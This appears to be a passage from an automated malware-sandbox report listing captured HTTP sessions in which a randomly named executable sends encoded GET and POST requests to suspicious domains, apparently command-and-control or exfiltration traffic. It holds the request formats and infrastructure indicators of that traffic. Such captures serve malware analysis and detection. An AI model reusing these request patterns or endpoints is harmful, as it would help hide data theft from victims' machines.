                                                                                Data Ascii: F[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUOl


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.550049104.21.77.71806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:44.289949894 CET487OUTGET /2pcx/?NVK8=WvMwIEBZ0GXEfEVGpcmqJr8xhaJ22fvMS8l3C/jH9UlzXoFcq8ozyiMxUW2Crv9xh6g9FMonHDW5wf9fDGMh/a7sRXpo9EZKPLBX7XcfSv3IAkyUxscM38Xc6L1z4gDQDA==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.aziziyeescortg.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:52:45.556891918 CET1236INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:52:45 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LHSWhAitLfHUaKY6Xkk5cCil0gL%2FBmUyPy53VhpBB1gnMpoLM3ziuZpe8%2FjZtSbhommSqt4khoUpxgVpvOD4XdQa5ED4s64EqvxU%2FPFygzN0tMf7TPjsFIkuYAjmkZXCxBDXZijRVm3c"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e55369e1e41e1-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED]
                                                                                Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="t
                                                                                Dec 14, 2024 13:52:45.556916952 CET878INData Raw: 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20
                                                                                Data Ascii: ext-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.550050172.67.220.36806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:51.031285048 CET758OUTPOST /b156/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.supernutra01.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.supernutra01.online
                                                                                Referer: http://www.supernutra01.online/b156/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 42 58 4e 56 6a 32 66 52 31 32 77 46 30 57 46 45 2b 44 4e 6a 4f 38 53 67 47 74 6a 64 72 38 41 4f 63 65 51 45 36 5a 61 69 78 42 66 72 4d 4f 69 67 48 4f 54 71 77 55 79 4c 33 57 39 5a 49 44 50 4c 33 51 4a 6d 6c 67 4e 53 36 41 55 2b 66 6f 63 2b 39 41 2b 4d 37 53 4b 63 34 35 63 73 6d 51 4f 65 2b 2f 30 5a 32 69 4a 6c 42 75 75 6d 62 4d 73 54 53 39 61 59 56 4c 75 75 30 35 67 63 4d 69 74 36 38 45 38 54 44 6f 77 68 67 76 35 67 50 7a 71 4f 55 68 53 6d 4a 69 32 78 70 31 4a 65 6c 63 41 73 64 70 6c 46 42 37 36 58 42 71 72 6d 6d 6b 46 35 43 61 39 44 55 32 73 59 59 73 46 70 69 36 63 64 6a 74 76 37 62 53 4d 3d
                                                                                Data Ascii: NVK8=BXNVj2fR12wF0WFE+DNjO8SgGtjdr8AOceQE6ZaixBfrMOigHOTqwUyL3W9ZIDPL3QJmlgNS6AU+foc+9A+M7SKc45csmQOe+/0Z2iJlBuumbMsTS9aYVLuu05gcMit68E8TDowhgv5gPzqOUhSmJi2xp1JelcAsdplFB76XBqrmmkF5Ca9DU2sYYsFpi6cdjtv7bSM=
                                                                                Dec 14, 2024 13:52:52.335288048 CET1236INHTTP/1.1 405 Not Allowed
                                                                                Date: Sat, 14 Dec 2024 12:52:52 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwevaR86MSyJ2sZ7245t0JaTPHz0Pa0CObjG3Y7z%2FLus02BDrRBzDpnnpkV%2Baz%2BI4h5ofbyyaXeXJjdNnU8trIMmn0Th8z%2Fup5aZ4eQpArly0lINlZdk0lqTzYJ1fh8TUHdfnNLit46q%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5560a8ee5e7d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1658&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to
                                                                                Dec 14, 2024 13:52:52.335350037 CET123INData Raw: 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e
                                                                                Data Ascii: disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.550051172.67.220.36806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:53.718107939 CET778OUTPOST /b156/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.supernutra01.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.supernutra01.online
                                                                                Referer: http://www.supernutra01.online/b156/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 42 58 4e 56 6a 32 66 52 31 32 77 46 30 31 64 45 38 67 6c 6a 47 38 53 6a 61 39 6a 64 68 63 41 56 63 65 4d 45 36 59 50 35 78 7a 4c 72 4e 76 53 67 4a 71 48 71 35 45 79 4c 76 47 38 64 56 54 4f 48 33 51 56 78 6c 69 4a 53 36 41 51 2b 66 71 45 2b 39 54 47 44 35 43 4b 61 35 4a 63 75 37 41 4f 65 2b 2f 30 5a 32 6d 70 4c 42 75 6d 6d 62 38 63 54 54 63 61 58 4a 62 75 74 78 35 67 63 65 53 73 53 38 45 38 4c 44 73 77 62 67 73 52 67 50 79 61 4f 54 30 2b 68 47 69 32 72 6e 56 49 74 71 65 6c 69 59 71 34 4b 42 59 4c 52 41 35 4c 37 6e 53 30 54 59 34 31 72 48 57 41 67 49 2f 4e 65 7a 4b 39 30 35 4f 2f 4c 46 46 5a 44 6a 72 51 77 6c 42 4f 72 6d 78 49 30 76 63 65 4a 46 51 56 37
                                                                                Data Ascii: NVK8=BXNVj2fR12wF01dE8gljG8Sja9jdhcAVceME6YP5xzLrNvSgJqHq5EyLvG8dVTOH3QVxliJS6AQ+fqE+9TGD5CKa5Jcu7AOe+/0Z2mpLBummb8cTTcaXJbutx5gceSsS8E8LDswbgsRgPyaOT0+hGi2rnVItqeliYq4KBYLRA5L7nS0TY41rHWAgI/NezK905O/LFFZDjrQwlBOrmxI0vceJFQV7
                                                                                Dec 14, 2024 13:52:55.020826101 CET1236INHTTP/1.1 405 Not Allowed
                                                                                Date: Sat, 14 Dec 2024 12:52:54 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cv9Q2Dq7%2FjZ0wdszFfkUqD65OPYAFJxg28HE42RueqcO1wdZdjsMSfZ%2FStxbb6FHAXulg9G6ZhF%2FToylKTEHpMZTiEMk%2BhE5v8B8de%2BEiobsYFl4Xo8elgTiuwdUUdY0CyyjQWPzaDAd2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e55717f954366-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1812&rtt_var=906&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to
                                                                                Dec 14, 2024 13:52:55.020905972 CET123INData Raw: 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e
                                                                                Data Ascii: disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.550052172.67.220.36806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:56.389866114 CET1795OUTPOST /b156/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.supernutra01.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.supernutra01.online
                                                                                Referer: http://www.supernutra01.online/b156/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 42 58 4e 56 6a 32 66 52 31 32 77 46 30 31 64 45 38 67 6c 6a 47 38 53 6a 61 39 6a 64 68 63 41 56 63 65 4d 45 36 59 50 35 78 7a 54 72 4d 64 71 67 47 74 37 71 6a 45 79 4c 6d 6d 38 51 56 54 4f 4b 33 51 64 39 6c 69 56 34 36 43 34 2b 4e 5a 4d 2b 70 79 47 44 7a 43 4b 61 38 35 63 74 6d 51 4f 78 2b 2f 6b 56 32 69 46 4c 42 75 6d 6d 62 2f 55 54 51 4e 61 58 5a 72 75 75 30 35 67 59 4d 69 73 70 38 41 51 31 44 73 39 6d 67 39 78 67 50 52 79 4f 52 43 4b 68 4c 69 32 74 6b 56 49 31 71 65 5a 70 59 71 6c 31 42 5a 2f 33 41 35 7a 37 6c 45 46 7a 4d 61 78 54 61 57 6b 57 4d 2b 56 74 79 2f 6c 4a 37 4f 7a 37 45 6c 52 4d 76 71 51 38 6c 55 79 37 7a 6a 46 4c 7a 39 57 68 56 32 6f 4f 77 4e 68 48 62 50 32 33 63 65 53 6d 6d 4d 65 53 47 2f 44 49 6f 4b 4c 6f 6f 42 6a 76 59 43 34 61 75 6d 6b 41 56 7a 62 58 54 45 37 2b 47 6d 76 7a 6a 6b 58 63 35 36 63 70 4b 4b 6b 52 5a 6a 42 42 6d 6b 6c 31 4b 52 76 38 75 34 44 44 69 78 53 78 73 5a 59 34 54 2f 58 37 48 73 39 4b 38 52 63 5a 48 68 58 2f 74 75 6f 73 52 76 41 4e 6c 41 43 4c 6c [TRUNCATED]
                                                                                Data Ascii: NVK8=BXNVj2fR12wF01dE8gljG8Sja9jdhcAVceME6YP5xzTrMdqgGt7qjEyLmm8QVTOK3Qd9liV46C4+NZM+pyGDzCKa85ctmQOx+/kV2iFLBummb/UTQNaXZruu05gYMisp8AQ1Ds9mg9xgPRyORCKhLi2tkVI1qeZpYql1BZ/3A5z7lEFzMaxTaWkWM+Vty/lJ7Oz7ElRMvqQ8lUy7zjFLz9WhV2oOwNhHbP23ceSmmMeSG/DIoKLooBjvYC4aumkAVzbXTE7+GmvzjkXc56cpKKkRZjBBmkl1KRv8u4DDixSxsZY4T/X7Hs9K8RcZHhX/tuosRvANlACLlxKiwHlSXmCHtHe9yrbajur68d5BgBcMeePEqA1pgWDfed08+YnCcEiYDj7m2d94nxHX6qGDZI8LnqngRRzQ8TH1TmFpA4qMAKSTlDgy+S+eH4D8jEA2X4bvdLg0CdX/1F69EGCj0yekA1uR7oN+3ecMCHOLsO+mDt8Bzi5LQ+MXcL5eUsnyCXfux+rtLVWvwpDSOKN0W6UWxcUT2hKiowMKRpyRBxlRVCKgVqDZH9Loaw3K7m9dceSSbMXgk67WVQ9Z7sTa96up4VG1MMdSD5IzjPGKI0mDuhXYp8bm7r3MffzsqxHC39PEl8wOLIzQdPxzmREIkTCHU7OmmvtPIE/ZtoMKKTq+ha78sMRlAoutrE6KS1J+kZH221RrlE2Zn2BN0jlxOSbruN+5Fjf417kbiWT/oKknCwAHUe+DMvyStJMvAU1OX3KkFTsTAIUvRgInNz2iq1M2M2yqYsOvkXrKln8ati1s0hAUWksKBa/W4zY2cTDoBlHtTOz9ksgGayJJqZorECOzHMVaM/7TMx1vaB59hRg/g3zKP8XaI+myuIdh+MXl++pBQiTbiTkD1cbtptmtUbfMcO1KK6oZFSvWUX/p/Lqkg21HNeruEIAYYUeawOU2NSPt1IhtwFbNB95+eDHxkQCIq6N+BmSlR+uSePm1Wvvy6Jw [TRUNCATED]
                                                                                Dec 14, 2024 13:52:57.703147888 CET1236INHTTP/1.1 405 Not Allowed
                                                                                Date: Sat, 14 Dec 2024 12:52:57 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2F8ebkqAwmEaHK23B86%2BGgJSbnNuM%2FU7G6ixEI9kheoKDXLpUHHCA%2B0Lmt0ybnqgrDgDeRLeNbk%2FhuaUGBmQly2%2FQGLfRVyL6xlqjjzI3FHy4EtthMNOoez4gzApdymyTTIrb21oKwZifw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5582295232fc-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3391&min_rtt=3391&rtt_var=1695&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding
                                                                                Dec 14, 2024 13:52:57.703166008 CET127INData Raw: 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49
                                                                                Data Ascii: to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.550053172.67.220.36806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:52:59.044490099 CET488OUTGET /b156/?NVK8=MVl1gD/31V017FUigyITB4WoU9vk2cZhWu89n4n57hetIOD+Bt387g2PwEolcziFwxZdvjZz2ToeNo5P6wKUsiSm8Z0p8wGBislo5nJGFMbTDcQ3U8CjU56G6a4dIAJwvA==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.supernutra01.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:53:00.357136965 CET845INHTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:53:00 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                                                Accept-Ranges: bytes
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2BK3qG9QyeXzbKuRB%2BRUY%2BnRhFawshXUSEIP0vMsZ6fLAzNDbGE0TYhGo8bNQvdmTStcaCEtiAHGl6PrLuEFLOREAe7w596dZyJiDG8p0utQbvWmaCgVR%2BTGGvFk20Yver43yMvM60Ix5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5592ceea1861-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1473&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Dec 14, 2024 13:53:00.357352972 CET1236INData Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61
                                                                                Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robo
                                                                                Dec 14, 2024 13:53:00.357395887 CET1236INData Raw: 63 68 61 69 6e 69 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66
                                                                                Data Ascii: chaining:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-con
